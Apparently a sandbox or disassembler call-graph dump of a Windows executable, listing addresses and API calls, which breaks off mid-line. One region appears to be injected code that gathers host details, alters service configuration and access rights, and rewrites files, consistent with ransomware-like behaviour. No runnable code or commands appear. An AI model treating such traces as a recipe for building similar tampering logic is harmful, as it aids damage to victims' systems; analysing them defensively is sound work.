4077a0 110592->110593 110594 407772 110592->110594 110596 408029 59 API calls 110593->110596 110600 407f27 59 API calls Mailbox 110594->110600 110598 4077aa 110596->110598 110597->110557 110599 420db6 Mailbox 59 API calls 110598->110599 110599->110597 110600->110597 110601 40e5ab 110604 40d100 110601->110604 110603 40e5b9 110605 40d11d 110604->110605 110621 40d37d 110604->110621 110606 4426e0 110605->110606 110607 442691 110605->110607 110625 40d144 110605->110625 110648 47a3e6 341 API calls __cinit 110606->110648 110610 442694 110607->110610 110615 4426af 110607->110615 110611 4426a0 110610->110611 110610->110625 110646 47a9fa 341 API calls 110611->110646 110612 422d40 __cinit 67 API calls 110612->110625 110615->110621 110647 47aea2 341 API calls 3 library calls 110615->110647 110616 40d434 110640 408a52 68 API calls 110616->110640 110617 4428b5 110617->110617 110618 40d54b 110618->110603 110621->110618 110653 469e4a 89 API calls 4 library calls 110621->110653 110623 40d443 110623->110603 110624 4427fc 110652 47a751 89 API calls 110624->110652 110625->110612 110625->110616 110625->110618 110625->110621 110625->110624 110629 4084c0 69 API calls 110625->110629 110635 409ea0 341 API calls 110625->110635 110636 408047 59 API calls 110625->110636 110638 408740 68 API calls __cinit 110625->110638 110639 408542 68 API calls 110625->110639 110641 40843a 68 API calls 110625->110641 110642 40cf7c 341 API calls 110625->110642 110643 409dda 59 API calls Mailbox 110625->110643 110644 40cf00 89 API calls 110625->110644 110645 40cd7d 341 API calls 110625->110645 110649 408a52 68 API calls 110625->110649 110650 409d3c 60 API calls Mailbox 110625->110650 110651 45678d 60 API calls 110625->110651 110629->110625 110635->110625 110636->110625 110638->110625 110639->110625 110640->110623 110641->110625 110642->110625 110643->110625 110644->110625 110645->110625 110646->110618 110647->110621 110648->110625 110649->110625 110650->110625 110651->110625 110652->110621 110653->110617 110654 40e48c 110657 40ccba 110654->110657 110656 40e498 110658 40ccd2 110657->110658 110659 40cd26 110657->110659 110658->110659 110660 409ea0 341 API calls 110658->110660 110663 40cd4f 110659->110663 110667 469e4a 89 API calls 4 library calls 110659->110667 110664 40cd09 110660->110664 110662 4425bc 110662->110662 110663->110656 110664->110663 110666 409d3c 60 API calls Mailbox 110664->110666 110666->110659 110667->110662 110668 40b40e 110669 41f944 60 API calls 110668->110669 110670 40b424 110669->110670 110676 40c5a7 110670->110676 110672 40b44c 110673 40a388 110672->110673 110688 469e4a 89 API calls 4 library calls 110672->110688 110675 4408e9 110677 407a16 59 API calls 110676->110677 110678 40c5cc _wcscmp 110677->110678 110679 407de1 59 API calls 110678->110679 110681 40c600 Mailbox 110678->110681 110680 441691 110679->110680 110682 407b2e 59 API calls 110680->110682 110681->110672 110683 44169c 110682->110683 110689 40843a 68 API calls 110683->110689 110685 4416ad 110686 4416b1 Mailbox 110685->110686 110690 409d3c 60 API calls Mailbox 110685->110690 110686->110672 110688->110675 110689->110685 110690->110686 110691 2f55a3b 110692 2f55a45 110691->110692 110697 2f54f7c 110691->110697 110693 2f551ae 110692->110693 110694 2f55a4b CreateThread 110692->110694 110696 2f55a59 RtlExitUserThread 110694->110696 110695 2f54f88 110701 2f55b1d 110696->110701 110697->110695 110704 2f55d20 110697->110704 110700 2f54f99 110702 2f55d20 2 API calls 110701->110702 110703 2f55b3c 110702->110703 110705 2f55d22 110704->110705 110705->110700 110706 2f55d39 VirtualAlloc 110705->110706 110707 2f55d46 VirtualFree 110705->110707 110706->110705 110707->110700 110709 2f55085 110710 2f5506f 110709->110710 110711 2f55089 110709->110711 110714 2f78550 110710->110714 110713 2f55078 110735 2f78556 110714->110735 110715 2f7855c 110717 2f78568 110715->110717 110733 2f77dd7 110715->110733 110716 2f78145 GetLastError 110716->110733 110724 2f7896a wsprintfW 110717->110724 110730 2f77d30 110717->110730 110718 2f78bc1 GetLastError 110718->110735 110719 2f78986 SetEntriesInAclW 110719->110735 110720 2f783fb GetUserNameW 110720->110733 110721 2f78209 GetUserNameW 110721->110733 110739 2f77d37 110721->110739 110722 2f789cd OpenMutexW 110722->110713 110723 2f78248 110726 2f7824a GetLastError 110723->110726 110724->110730 110726->110713 110727 2f7836e GetLastError 110727->110733 110728 2f77d6c GetVolumeInformationW 110728->110713 110729 2f77d20 110729->110728 110729->110730 110732 2f77d83 GetWindowsDirectoryW 110729->110732 110736 2f77e06 GetComputerNameW 110729->110736 110729->110739 110730->110728 110730->110739 110731 2f77fd4 GetLastError 110731->110733 110732->110730 110732->110739 110733->110716 110733->110720 110733->110721 110733->110723 110733->110726 110733->110727 110733->110728 110733->110729 110733->110730 110733->110731 110738 2f77f6b GetVolumeInformationW 110733->110738 110733->110739 110734 2f78953 AllocateAndInitializeSid 110734->110735 110735->110714 110735->110715 110735->110716 110735->110717 110735->110718 110735->110719 110735->110722 110735->110724 110735->110729 110735->110730 110735->110733 110735->110734 110737 2f7890b LocalFree 110735->110737 110735->110739 110736->110739 110737->110735 110738->110733 110739->110713 110740 403633 110741 40366a 110740->110741 110742 4036e7 110741->110742 110743 403688 110741->110743 110779 4036e5 110741->110779 110747 4036ed 110742->110747 110748 43d0cc 110742->110748 110744 403695 110743->110744 110745 40374b PostQuitMessage 110743->110745 110750 4036a0 110744->110750 110751 43d154 110744->110751 110782 4036d8 110745->110782 110746 4036ca DefWindowProcW 110746->110782 110752 4036f2 110747->110752 110753 403715 SetTimer RegisterWindowMessageW 110747->110753 110789 411070 10 API calls Mailbox 110748->110789 110755 403755 110750->110755 110756 4036a8 110750->110756 110805 462527 71 API calls _memset 110751->110805 110759 4036f9 KillTimer 110752->110759 110760 43d06f 110752->110760 110757 40373e CreatePopupMenu 110753->110757 110753->110782 110754 43d0f3 110790 411093 341 API calls Mailbox 110754->110790 110787 4044a0 64 API calls _memset 110755->110787 110762 4036b3 110756->110762 110763 43d139 110756->110763 110757->110782 110785 40443a Shell_NotifyIconW _memset 110759->110785 110766 43d074 110760->110766 110767 43d0a8 MoveWindow 110760->110767 110769 4036be 110762->110769 110770 43d124 110762->110770 110763->110746 110804 457c36 59 API calls Mailbox 110763->110804 110764 43d166 110764->110746 110764->110782 110772 43d097 SetFocus 110766->110772 110773 43d078 110766->110773 110767->110782 110769->110746 110791 40443a Shell_NotifyIconW _memset 110769->110791 110803 462d36 81 API calls _memset 110770->110803 110771 403764 110771->110782 110772->110782 110773->110769 110776 43d081 110773->110776 110774 40370c 110786 403114 DeleteObject DestroyWindow Mailbox 110774->110786 110788 411070 10 API calls Mailbox 110776->110788 110779->110746 110783 43d118 110792 40434a 110783->110792 110785->110774 110786->110782 110787->110771 110788->110782 110789->110754 110790->110769 110791->110783 110793 404375 _memset 110792->110793 110806 404182 110793->110806 110796 4043fa 110798 404430 Shell_NotifyIconW 110796->110798 110799 404414 Shell_NotifyIconW 110796->110799 110800 404422 110798->110800 110799->110800 110810 40407c 110800->110810 110802 404429 110802->110779 110803->110771 110804->110779 110805->110764 110807 43d423 110806->110807 110808 404196 110806->110808 110807->110808 110809 43d42c DestroyIcon 110807->110809 110808->110796 110832 462f94 62 API calls _W_store_winword 110808->110832 110809->110808 110811 404098 110810->110811 110812 40416f Mailbox 110810->110812 110813 407a16 59 API calls 110811->110813 110812->110802 110814 4040a6 110813->110814 110815 4040b3 110814->110815 110816 43d3c8 LoadStringW 110814->110816 110817 407bcc 59 API calls 110815->110817 110819 43d3e2 110816->110819 110818 4040c8 110817->110818 110818->110819 110820 4040d9 110818->110820 110821 407b2e 59 API calls 110819->110821 110822 4040e3 110820->110822 110823 404174 110820->110823 110826 43d3ec 110821->110826 110825 407b2e 59 API calls 110822->110825 110824 408047 59 API calls 110823->110824 110829 4040ed _memset _wcscpy 110824->110829 110825->110829 110827 407cab 59 API calls 110826->110827 110826->110829 110828 43d40e 110827->110828 110831 407cab 59 API calls 110828->110831 110830 404155 Shell_NotifyIconW 110829->110830 110830->110812 110831->110829 110832->110796 110833 427c56 110834 427c62 110833->110834 110870 429e08 GetStartupInfoW 110834->110870 110837 427c67 110872 428b7c GetProcessHeap 110837->110872 110838 427cbf 110839 427cca 110838->110839 110955 427da6 58 API calls 3 library calls 110838->110955 110873 429ae6 110839->110873 110842 427cd0 110843 427cdb __RTC_Initialize 110842->110843 110956 427da6 58 API calls 3 library calls 110842->110956 110894 42d5d2 110843->110894 110846 427cea 110847 427cf6 GetCommandLineW 110846->110847 110957 427da6 58 API calls 3 library calls 110846->110957 110913 434f23 GetEnvironmentStringsW 110847->110913 110850 427cf5 110850->110847 110853 427d10 110854 427d1b 110853->110854 110958 4230b5 58 API calls 3 library calls 110853->110958 110923 434d58 110854->110923 110857 427d21 110858 427d2c 110857->110858 110959 4230b5 58 API calls 3 library calls 110857->110959 110937 4230ef 110858->110937 110861 427d34 110862 427d3f __wwincmdln 110861->110862 110960 4230b5 58 API calls 3 library calls 110861->110960 110943 4047d0 110862->110943 110865 427d53 110866 427d62 110865->110866 110961 423358 58 API calls _doexit 110865->110961 110962 4230e0 58 API calls _doexit 110866->110962 110869 427d67 __wfsopen 110871 429e1e 110870->110871 110871->110837 110872->110838 110963 423187 36 API calls 2 library calls 110873->110963 110875 429aeb 110964 429d3c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 110875->110964 110877 429af0 110878 429af4 110877->110878 110966 429d8a TlsAlloc 110877->110966 110965 429b5c 61 API calls 2 library calls 110878->110965 110881 429af9 110881->110842 110882 429b06 110882->110878 110883 429b11 110882->110883 110967 4287d5 110883->110967 110886 429b53 110975 429b5c 61 API calls 2 library calls 110886->110975 110889 429b32 110889->110886 110891 429b38 110889->110891 110890 429b58 110890->110842 110974 429a33 58 API calls 4 library calls 110891->110974 110893 429b40 GetCurrentThreadId 110893->110842 110895 42d5de __wfsopen 110894->110895 110896 429c0b __lock 58 API calls 110895->110896 110897 42d5e5 110896->110897 110898 4287d5 __calloc_crt 58 API calls 110897->110898 110899 42d5f6 110898->110899 110900 42d661 GetStartupInfoW 110899->110900 110901 42d601 __wfsopen @_EH4_CallFilterFunc@8 110899->110901 110907 42d676 110900->110907 110910 42d7a5 110900->110910 110901->110846 110902 42d86d 110989 42d87d LeaveCriticalSection _doexit 110902->110989 110904 4287d5 __calloc_crt 58 API calls 110904->110907 110905 42d7f2 GetStdHandle 110905->110910 110906 42d805 GetFileType 110906->110910 110907->110904 110908 42d6c4 110907->110908 110907->110910 110909 42d6f8 GetFileType 110908->110909 110908->110910 110987 429e2b InitializeCriticalSectionAndSpinCount 110908->110987 110909->110908 110910->110902 110910->110905 110910->110906 110988 429e2b InitializeCriticalSectionAndSpinCount 110910->110988 110914 434f34 110913->110914 110915 427d06 110913->110915 110990 42881d 58 API calls 2 library calls 110914->110990 110919 434b1b GetModuleFileNameW 110915->110919 110917 434f5a _memmove 110918 434f70 FreeEnvironmentStringsW 110917->110918 110918->110915 110920 434b4f _wparse_cmdline 110919->110920 110922 434b8f _wparse_cmdline 110920->110922 110991 42881d 58 API calls 2 library calls 110920->110991 110922->110853 110924 434d71 __wsetenvp 110923->110924 110928 434d69 110923->110928 110925 4287d5 __calloc_crt 58 API calls 110924->110925 110933 434d9a __wsetenvp 110925->110933 110926 434df1 110927 422d55 _free 58 API calls 110926->110927 110927->110928 110928->110857 110929 4287d5 __calloc_crt 58 API calls 110929->110933 110930 434e16 110932 422d55 _free 58 API calls 110930->110932 110932->110928 110933->110926 110933->110928 110933->110929 110933->110930 110934 434e2d 110933->110934 110992 434607 58 API calls __wfsopen 110933->110992 110993 428dc6 IsProcessorFeaturePresent 110934->110993 110936 434e39 110936->110857 110938 4230fb __IsNonwritableInCurrentImage 110937->110938 111008 42a4d1 110938->111008 110940 423119 __initterm_e 110941 422d40 __cinit 67 API calls 110940->110941 110942 423138 _doexit __IsNonwritableInCurrentImage 110940->110942 110941->110942 110942->110861 110944 4047ea 110943->110944 110954 404889 110943->110954 110945 404824 IsThemeActive 110944->110945 111011 42336c 110945->111011 110949 404850 111023 4048fd SystemParametersInfoW SystemParametersInfoW 110949->111023 110951 40485c 111024 403b3a 110951->111024 110954->110865 110955->110839 110956->110843 110957->110850 110961->110866 110962->110869 110963->110875 110964->110877 110965->110881 110966->110882 110968 4287dc 110967->110968 110970 428817 110968->110970 110972 4287fa 110968->110972 110976 4351f6 110968->110976 110970->110886 110973 429de6 TlsSetValue 110970->110973 110972->110968 110972->110970 110984 42a132 Sleep 110972->110984 110973->110889 110974->110893 110975->110890 110977 435201 110976->110977 110981 43521c 110976->110981 110978 43520d 110977->110978 110977->110981 110985 428b28 58 API calls __getptd_noexit 110978->110985 110979 43522c HeapAlloc 110979->110981 110982 435212 110979->110982 110981->110979 110981->110982 110986 4233a1 DecodePointer 110981->110986 110982->110968 110984->110972 110985->110982 110986->110981 110987->110908 110988->110910 110989->110901 110990->110917 110991->110922 110992->110933 110994 428dd1 110993->110994 110999 428c59 110994->110999 110998 428dec 110998->110936 111000 428c73 _memset __call_reportfault 110999->111000 111001 428c93 IsDebuggerPresent 111000->111001 111007 42a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 111001->111007 111003 428d57 __call_reportfault 111004 42c5f6 __crtLCMapStringA_stat 6 API calls 111003->111004 111005 428d7a 111004->111005 111006 42a140 GetCurrentProcess TerminateProcess 111005->111006 111006->110998 111007->111003 111009 42a4d4 EncodePointer 111008->111009 111009->111009 111010 42a4ee 111009->111010 111010->110940 111012 429c0b __lock 58 API calls 111011->111012 111013 423377 DecodePointer EncodePointer 111012->111013 111076 429d75 LeaveCriticalSection 111013->111076 111015 404849 111016 4233d4 111015->111016 111017 4233f8 111016->111017 111018 4233de 111016->111018 111017->110949 111018->111017 111077 428b28 58 API calls __getptd_noexit 111018->111077 111020 4233e8 111078 428db6 9 API calls __wfsopen 111020->111078 111022 4233f3 111022->110949 111023->110951 111025 403b47 __ftell_nolock 111024->111025 111026 407667 59 API calls 111025->111026 111027 403b51 GetCurrentDirectoryW 111026->111027 111079 403766 111027->111079 111076->111015 111077->111020 111078->111022 111080 407667 59 API calls 111079->111080 111081 40377c 111080->111081 111210 403d31 111081->111210 111083 40379a 111084 404706 61 API calls 111083->111084 111085 4037ae 111084->111085 111086 407de1 59 API calls 111085->111086 111087 4037bb 111086->111087 111088 404ddd 136 API calls 111087->111088 111089 4037d4 111088->111089 111090 43d173 111089->111090 111091 4037dc Mailbox 111089->111091 111211 403d3e __ftell_nolock 111210->111211 111212 407bcc 59 API calls 111211->111212 111213 403ea4 Mailbox 111211->111213 111215 403d70 111212->111215 111213->111083 111214 4079f2 59 API calls 111214->111215 111215->111214 111222 403da6 Mailbox 111215->111222 111216 403e77 111216->111213 111217 407de1 59 API calls 111216->111217 111219 403e98 111217->111219 111218 407de1 59 API calls 111218->111222 111220 403f74 59 API calls 111219->111220 111220->111213 111222->111213 111222->111216 111222->111218 111223 4079f2 59 API calls 111222->111223 111287 403f74 111222->111287 111223->111222 111288 403f82 111287->111288 111292 403fa4 _memmove 111287->111292 111290 420db6 Mailbox 59 API calls 111288->111290 111289 420db6 Mailbox 59 API calls 111291 403fb8 111289->111291 111290->111292 111291->111222 111292->111289 111579 401055 111584 402649 111579->111584 111582 422d40 __cinit 67 API calls 111583 401064 111582->111583 111585 407667 59 API calls 111584->111585 111586 4026b7 111585->111586 111591 403582 111586->111591 111588 402754 111589 40105a 111588->111589 111594 403416 59 API calls 2 library calls 111588->111594 111589->111582 111595 4035b0 111591->111595 111594->111588 111596 4035bd 111595->111596 111597 4035a1 111595->111597 111596->111597 111598 4035c4 RegOpenKeyExW 111596->111598 111597->111588 111598->111597 111599 4035de RegQueryValueExW 111598->111599 111600 403614 RegCloseKey 111599->111600 111601 4035ff 111599->111601 111600->111597 111601->111600 111602 2f5b180 111610 2f5b0de 111602->111610 111603 2f5b2a7 SetFilePointerEx 111604 2f5b1df 111603->111604 111609 2f5b1c6 111603->111609 111605 2f5b196 111606 2f5b3a6 111605->111606 111605->111609 111607 2f5b3b2 111606->111607 111608 2f5b328 SetFilePointerEx 111606->111608 111609->111604 111611 2f5b2e0 WriteFile 111609->111611 111610->111602 111610->111603 111610->111605 111610->111608 111612 2f5b0d0 SetFilePointerEx 111610->111612 111613 2f5b253 111610->111613 111612->111610 111614 2f5b054 111612->111614 111615 401016 111620 404974 111615->111620 111618 422d40 __cinit 67 API calls 111619 401025 111618->111619 111621 420db6 Mailbox 59 API calls 111620->111621 111622 40497c 111621->111622 111623 40101b 111622->111623 111627 404936 111622->111627 111623->111618 111628 40493f 111627->111628 111630 404951 111627->111630 111629 422d40 __cinit 67 API calls 111628->111629 111629->111630 111631 4049a0 111630->111631 111632 407667 59 API calls 111631->111632 111633 4049b8 GetVersionExW 111632->111633 111634 407bcc 59 API calls 111633->111634 111635 4049fb 111634->111635 111636 407d2c 59 API calls 111635->111636 111639 404a28 111635->111639 111637 404a1c 111636->111637 111638 407726 59 API calls 111637->111638 111638->111639 111640 43d864 111639->111640 111641 404a93 GetCurrentProcess IsWow64Process 111639->111641 111642 404aac 111641->111642 111643 404ac2 111642->111643 111644 404b2b GetSystemInfo 111642->111644 111655 404b37 111643->111655 111645 404af8 111644->111645 111645->111623 111648 404ad4 111651 404b37 2 API calls 111648->111651 111649 404b1f GetSystemInfo 111650 404ae9 111649->111650 111650->111645 111652 404aef FreeLibrary 111650->111652 111653 404adc GetNativeSystemInfo 111651->111653 111652->111645 111653->111650 111656 404ad0 111655->111656 111657 404b40 LoadLibraryA 111655->111657 111656->111648 111656->111649 111657->111656 111658 404b51 GetProcAddress 111657->111658 111658->111656 111659 2f57b22 111660 2f57b2b 111659->111660 111661 2f55f10 111659->111661 111662 2f56084 SetFilePointerEx 111661->111662 111663 2f55d90 111661->111663 111662->111661 111664 401078 111669 40708b 111664->111669 111666 40108c 111667 422d40 __cinit 67 API calls 111666->111667 111668 401096 111667->111668 111670 40709b __ftell_nolock 111669->111670 111671 407667 59 API calls 111670->111671 111672 407151 111671->111672 111673 404706 61 API calls 111672->111673 111674 40715a 111673->111674 111700 42050b 111674->111700 111677 407cab 59 API calls 111678 407173 111677->111678 111679 403f74 59 API calls 111678->111679 111680 407182 111679->111680 111681 407667 59 API calls 111680->111681 111682 40718b 111681->111682 111683 407d8c 59 API calls 111682->111683 111684 407194 RegOpenKeyExW 111683->111684 111685 43e8b1 RegQueryValueExW 111684->111685 111689 4071b6 Mailbox 111684->111689 111686 43e943 RegCloseKey 111685->111686 111687 43e8ce 111685->111687 111686->111689 111698 43e955 _wcscat Mailbox __wsetenvp 111686->111698 111688 420db6 Mailbox 59 API calls 111687->111688 111690 43e8e7 111688->111690 111689->111666 111691 40522e 59 API calls 111690->111691 111692 43e8f2 RegQueryValueExW 111691->111692 111693 43e90f 111692->111693 111695 43e929 111692->111695 111694 407bcc 59 API calls 111693->111694 111694->111695 111695->111686 111696 407de1 59 API calls 111696->111698 111697 403f74 59 API calls 111697->111698 111698->111689 111698->111696 111698->111697 111699 4079f2 59 API calls 111698->111699 111699->111698 111701 431940 __ftell_nolock 111700->111701 111702 420518 GetFullPathNameW 111701->111702 111703 42053a 111702->111703 111704 407bcc 59 API calls 111703->111704 111705 407165 111704->111705 111705->111677 111706 2f5520c 111709 2f7cbd0 111706->111709 111708 2f55211 111719 2f7be50 _wcslen 111709->111719 111710 2f7c168 111748 2f7a905 LocalFree 111710->111748 111712 2f55d20 2 API calls 111712->111719 111713 2f7c78e CloseServiceHandle 111713->111719 111714 2f7bffd StrStrIW 111714->111719 111715 2f7c706 StrStrIW 111715->111719 111716 2f7bf68 StrStrIW 111716->111719 111717 2f7c72b StrStrIW 111717->111719 111719->111708 111719->111709 111719->111710 111719->111712 111719->111713 111719->111714 111719->111715 111719->111716 111719->111717 111720 2f7c399 StrStrIW 111719->111720 111721 2f7bf7e 111719->111721 111723 2f7c0fd CloseServiceHandle 111719->111723 111724 2f7bfe9 111719->111724 111725 2f7c7e4 StartServiceW 111719->111725 111728 2f7c65a ChangeServiceConfigW 111719->111728 111729 2f5ce90 111719->111729 111747 2f7a350 CloseServiceHandle 111719->111747 111720->111719 111726 2f7c3a9 111720->111726 111721->111725 111727 2f7c36b OpenServiceW 111721->111727 111723->111719 111724->111708 111725->111719 111726->111708 111727->111719 111728->111719 111728->111724 111741 2f5cc9b _wcslen 111729->111741 111730 2f5d5c5 CreateFileW 111730->111741 111731 2f5d729 GetFileSizeEx 111733 2f5d8a1 CloseHandle 111731->111733 111731->111741 111732 2f5d426 111732->111733 111734 2f5d42a CloseHandle 111732->111734 111733->111741 111734->111741 111735 2f5cd5c lstrcmpiW 111735->111741 111737 2f55d20 VirtualAlloc VirtualFree 111737->111741 111738 2f5cca0 lstrcmpiW 111738->111741 111740 2f5d049 SetFilePointerEx 111740->111741 111741->111719 111741->111729 111741->111730 111741->111731 111741->111732 111741->111733 111741->111734 111741->111735 111741->111737 111741->111738 111741->111740 111742 2f5d378 CloseHandle 111741->111742 111743 2f5cfbb GetFileTime 111741->111743 111745 2f5cc92 111741->111745 111746 2f5d903 111741->111746 111749 2f58937 VirtualAlloc VirtualFree 111741->111749 111750 2f58470 VirtualAlloc VirtualFree 111741->111750 111742->111741 111743->111741 111744 2f8fdfc 40 API calls 111744->111746 111745->111719 111746->111744 111746->111745 111747->111719 111748->111724 111749->111741 111751 43fdfc 111755 40ab30 Mailbox _memmove 111751->111755 111753 45617e Mailbox 59 API calls 111763 40a057 111753->111763 111756 40b525 111755->111756 111762 409f37 Mailbox 111755->111762 111755->111763 111777 407de1 59 API calls 111755->111777 111782 47bc6b 341 API calls 111755->111782 111784 40b2b6 111755->111784 111786 409ea0 341 API calls 111755->111786 111787 44086a 111755->111787 111789 440878 111755->111789 111791 44085c 111755->111791 111792 40b21c 111755->111792 111794 420db6 59 API calls Mailbox 111755->111794 111796 456e8f 59 API calls 111755->111796 111803 47445a 341 API calls 111755->111803 111804 468715 111755->111804 111808 411fc3 111755->111808 111848 482141 111755->111848 111886 47df23 111755->111886 111889 46d07b 111755->111889 111936 47c2e0 111755->111936 111968 467956 111755->111968 111974 45617e 111755->111974 111979 409c90 59 API calls Mailbox 111755->111979 111983 47c193 85 API calls 2 library calls 111755->111983 111985 469e4a 89 API calls 4 library calls 111756->111985 111759 420db6 59 API calls Mailbox 111759->111762 111760 4409e5 111990 469e4a 89 API calls 4 library calls 111760->111990 111761 440055 111984 469e4a 89 API calls 4 library calls 111761->111984 111762->111759 111762->111761 111762->111763 111766 40b475 111762->111766 111768 40b47a 111762->111768 111770 408047 59 API calls 111762->111770 111775 407667 59 API calls 111762->111775 111776 456e8f 59 API calls 111762->111776 111778 4409d6 111762->111778 111779 422d40 67 API calls __cinit 111762->111779 111781 40a55a 111762->111781 111977 40c8c0 341 API calls 2 library calls 111762->111977 111978 40b900 60 API calls Mailbox 111762->111978 111771 408047 59 API calls 111766->111771 111768->111760 111768->111761 111769 440064 111770->111762 111771->111763 111775->111762 111776->111762 111777->111755 111989 469e4a 89 API calls 4 library calls 111778->111989 111779->111762 111988 469e4a 89 API calls 4 library calls 111781->111988 111782->111755 111982 40f6a3 341 API calls 111784->111982 111786->111755 111986 409c90 59 API calls Mailbox 111787->111986 111987 469e4a 89 API calls 4 library calls 111789->111987 111791->111753 111791->111763 111980 409d3c 60 API calls Mailbox 111792->111980 111794->111755 111795 40b22d 111981 409d3c 60 API calls Mailbox 111795->111981 111796->111755 111803->111755 111805 468723 111804->111805 111806 46871e 111804->111806 111805->111755 111991 4677b3 111806->111991 111809 409a98 59 API calls 111808->111809 111810 411fdb 111809->111810 111812 420db6 Mailbox 59 API calls 111810->111812 111818 446585 111810->111818 111813 411ff4 111812->111813 111815 412004 111813->111815 112035 4057a6 60 API calls Mailbox 111813->112035 111814 412029 111819 409b3c 59 API calls 111814->111819 111824 412036 111814->111824 111817 409837 84 API calls 111815->111817 111820 412012 111817->111820 111818->111814 112038 46f574 59 API calls 111818->112038 111821 4465cd 111819->111821 111822 4057f6 67 API calls 111820->111822 111823 4465d5 111821->111823 111821->111824 111825 412021 111822->111825 111827 409b3c 59 API calls 111823->111827 111826 405cdf 2 API calls 111824->111826 111825->111814 111825->111818 112037 4058ba CloseHandle 111825->112037 111829 41203d 111826->111829 111827->111829 111830 4465e7 111829->111830 111831 412057 111829->111831 111833 420db6 Mailbox 59 API calls 111830->111833 111832 407667 59 API calls 111831->111832 111834 41205f 111832->111834 111835 4465ed 111833->111835 112014 405572 111834->112014 111837 446601 111835->111837 112039 405850 ReadFile SetFilePointerEx 111835->112039 111842 446605 _memmove 111837->111842 112040 4676c4 59 API calls 2 library calls 111837->112040 111839 41206e 111839->111842 112029 409a3c 111839->112029 111843 412082 Mailbox 111844 4120bc 111843->111844 111845 405c6f CloseHandle 111843->111845 111844->111755 111846 4120b0 111845->111846 111846->111844 112036 4058ba CloseHandle 111846->112036 111849 407667 59 API calls 111848->111849 111850 482158 111849->111850 111851 409837 84 API calls 111850->111851 111852 482167 111851->111852 111853 407a16 59 API calls 111852->111853 111854 48217a 111853->111854 111855 409837 84 API calls 111854->111855 111856 482187 111855->111856 111857 4821a1 111856->111857 111858 482215 111856->111858 111859 409b3c 59 API calls 111857->111859 111860 409837 84 API calls 111858->111860 111861 4821a6 111859->111861 111862 48221a 111860->111862 111863 482204 111861->111863 111866 4821bd 111861->111866 111864 482228 111862->111864 111865 482246 111862->111865 111869 409a98 59 API calls 111863->111869 111867 409a98 59 API calls 111864->111867 111868 48225b 111865->111868 111871 409b3c 59 API calls 111865->111871 111870 40784b 59 API calls 111866->111870 111880 482211 Mailbox 111867->111880 111872 482270 111868->111872 111875 409b3c 59 API calls 111868->111875 111869->111880 111874 4821ca 111870->111874 111871->111868 111873 407f77 59 API calls 111872->111873 111876 48228a 111873->111876 111877 407b2e 59 API calls 111874->111877 111875->111872 112044 45f401 111876->112044 111879 4821d8 111877->111879 111882 40784b 59 API calls 111879->111882 111880->111755 111881 4821ff 111885 409a3c 59 API calls 111881->111885 111883 4821f1 111882->111883 111884 407b2e 59 API calls 111883->111884 111884->111881 111885->111880 111887 47cadd 130 API calls 111886->111887 111888 47df33 111887->111888 111888->111755 111890 46d09a 111889->111890 111891 46d0a5 111889->111891 111892 409b3c 59 API calls 111890->111892 111894 407667 59 API calls 111891->111894 111932 46d17f Mailbox 111891->111932 111892->111891 111893 420db6 Mailbox 59 API calls 111895 46d1c8 111893->111895 111896 46d0c9 111894->111896 111897 46d1d4 111895->111897 112064 4057a6 60 API calls Mailbox 111895->112064 111899 407667 59 API calls 111896->111899 111900 409837 84 API calls 111897->111900 111901 46d0d2 111899->111901 111902 46d1ec 111900->111902 111903 409837 84 API calls 111901->111903 111904 4057f6 67 API calls 111902->111904 111905 46d0de 111903->111905 111906 46d1fb 111904->111906 111907 40459b 59 API calls 111905->111907 111908 46d233 111906->111908 111909 46d1ff GetLastError 111906->111909 111910 46d0f3 111907->111910 111913 46d295 111908->111913 111914 46d25e 111908->111914 111911 46d218 111909->111911 111912 407b2e 59 API calls 111910->111912 111933 46d188 Mailbox 111911->111933 112065 4058ba CloseHandle 111911->112065 111915 46d126 111912->111915 111916 420db6 Mailbox 59 API calls 111913->111916 111917 420db6 Mailbox 59 API calls 111914->111917 111918 46d178 111915->111918 111923 463c37 3 API calls 111915->111923 111919 46d29a 111916->111919 111920 46d263 111917->111920 111922 409b3c 59 API calls 111918->111922 111927 407667 59 API calls 111919->111927 111919->111933 111924 46d274 111920->111924 111928 407667 59 API calls 111920->111928 111922->111932 111925 46d136 111923->111925 112066 47fbce 59 API calls 2 library calls 111924->112066 111925->111918 111926 46d13a 111925->111926 111929 407de1 59 API calls 111926->111929 111927->111933 111928->111924 111931 46d147 111929->111931 112063 463a2a 63 API calls Mailbox 111931->112063 111932->111893 111932->111933 111933->111755 111935 46d150 Mailbox 111935->111918 111937 407667 59 API calls 111936->111937 111938 47c2f4 111937->111938 111939 407667 59 API calls 111938->111939 111940 47c2fc 111939->111940 111941 407667 59 API calls 111940->111941 111942 47c304 111941->111942 111943 409837 84 API calls 111942->111943 111967 47c312 111943->111967 111944 407bcc 59 API calls 111944->111967 111945 407924 59 API calls 111945->111967 111946 47c4fb 111947 47c528 Mailbox 111946->111947 111948 409a3c 59 API calls 111946->111948 111947->111755 111948->111947 111949 47c4e2 111950 407cab 59 API calls 111949->111950 111952 47c4ef 111950->111952 111951 47c4fd 111953 407cab 59 API calls 111951->111953 111956 407b2e 59 API calls 111952->111956 111957 47c50c 111953->111957 111954 408047 59 API calls 111954->111967 111955 407e4f 59 API calls 111958 47c3a9 CharUpperBuffW 111955->111958 111956->111946 111959 407b2e 59 API calls 111957->111959 112067 40843a 68 API calls 111958->112067 111959->111946 111960 407e4f 59 API calls 111962 47c469 CharUpperBuffW 111960->111962 111963 40c5a7 69 API calls 111962->111963 111963->111967 111964 409837 84 API calls 111964->111967 111965 407cab 59 API calls 111965->111967 111966 407b2e 59 API calls 111966->111967 111967->111944 111967->111945 111967->111946 111967->111947 111967->111949 111967->111951 111967->111954 111967->111955 111967->111960 111967->111964 111967->111965 111967->111966 111969 467962 111968->111969 111970 420db6 Mailbox 59 API calls 111969->111970 111971 467970 111970->111971 111972 46797e 111971->111972 111973 407667 59 API calls 111971->111973 111972->111755 111973->111972 112068 4560c0 111974->112068 111976 45618c 111976->111755 111977->111762 111978->111762 111979->111755 111980->111795 111981->111784 111982->111756 111983->111755 111984->111769 111985->111791 111986->111791 111987->111791 111988->111763 111989->111760 111990->111763 111992 4678ea 111991->111992 111993 4677ca 111991->111993 111992->111805 111994 4677e2 111993->111994 111996 46780a 111993->111996 111997 467821 111993->111997 111994->111996 111998 4677f2 111994->111998 111995 420db6 Mailbox 59 API calls 112011 467800 Mailbox _memmove 111995->112011 111996->111995 112001 420db6 Mailbox 59 API calls 111997->112001 112009 46783e 111997->112009 112004 420db6 Mailbox 59 API calls 111998->112004 111999 467877 112003 420db6 